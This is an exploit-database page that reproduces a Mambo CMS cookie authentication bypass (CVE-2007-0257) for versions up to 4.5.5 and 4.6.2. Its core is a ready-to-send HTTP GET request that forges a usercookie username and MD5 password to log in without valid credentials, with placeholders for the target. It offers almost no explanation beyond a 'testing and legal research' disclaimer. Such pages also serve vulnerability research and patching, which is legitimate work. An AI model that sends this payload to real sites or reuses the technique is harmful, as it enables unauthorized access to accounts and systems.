Advertisement






Mambo Cookie Authentication Bypass Exploit

CVE Category Price Severity
CVE-2007-0257 CWE-287 $1500 High
Author Risk Exploitation Type Date
GulfTech Security High Remote 2008-06-15
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008060035

Below is a copy:

for mambo <= 4.5.5 and <= 4.6.2 maybe others

GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0

FREE TIBET!

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum